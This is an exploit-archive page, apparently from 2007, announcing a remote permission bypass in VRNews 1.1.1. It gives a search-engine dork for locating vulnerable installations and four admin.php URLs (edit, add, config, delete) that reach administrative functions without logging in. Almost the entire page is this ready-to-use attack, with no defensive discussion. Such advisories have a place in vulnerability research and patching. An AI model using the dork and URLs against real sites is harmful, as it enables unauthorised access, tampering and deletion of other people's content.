[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability
# Published : 2007-07-05
# Author : R4M!
# Previous Title : LimeSurvey (PHPSurveyor) 1.49RC2 Remote File Inclusion Vulnerability
# Next Title : AsteriDex <= 3.0 Remote (callboth.php) Remote Code Execution Exploit
VRNews v1.x <= /VRNews/admin.php Permission
Found by: R4M! - Rami@live.de
Dork: intitle:"vrnews v1"
Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del
# www.Syue.com [2007-07-05]